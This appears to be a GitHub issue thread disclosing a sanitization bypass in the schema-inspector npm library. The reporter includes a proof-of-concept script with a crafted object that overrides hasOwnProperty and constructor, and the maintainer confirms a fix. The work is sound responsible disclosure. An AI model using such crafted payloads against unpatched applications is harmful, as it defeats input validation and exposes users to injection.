A Vulnerability in sanitize()

[xiaofen9]

We found that a maliciously crafted javascript object can bypass the sanitize() of the schema-inspector.
The vulnerability is from the following code: schema-inspector uses a built-in function (hasOwnProperty) from the unsafe user-input to decide whether it should sanitize the object or not. As a result, a crafted payload can overwrite this function to manipulate the sanitization result.

https://github.com/Atinux/schema-inspector/blob/7f67b2a95f85ecb76d0dc5326d76d082a2b99e1f/lib/schema-inspector.js#L1013-L1019

One way to fix this issue is to use Object.prototype.hasOwnProperty instead. ( This function is much safer, a detailed discussion can be found here https://stackoverflow.com/questions/12017693/why-use-object-prototype-hasownproperty-callmyobj-prop-instead-of-myobj-hasow)

if(Object.prototype.hasOwnProperty.call(post,i))

Reproduce Script

var inspector = require('schema-inspector');

var user_input = {
    firstname: 'sterling',
    lastname: "archer",
    jobs: {"name" : 'notArrary',  "age": 20, "hasOwnProperty": (elem) => {return false;}, 'constructor':Array}
};

var sanitization = {
    type: 'object',
    properties: {
        firstname: { type: 'string', rules: ['trim', 'title'] },
        lastname: { type: 'string', rules: ['trim', 'title'] },
        jobs: {
            type: 'array',
            splitWith: ',',
            items: { type: 'string', rules: ['trim', 'title'] }
        },
        email: { type: 'string', rules: ['trim', 'lower'] }
    }
};

inspector.sanitize(sanitization, user_input);
console.log(user_input);

[Atinux]

It's now fixed in https://github.com/Atinux/schema-inspector/releases/tag/v1.6.9, thank you very much @xiaofen9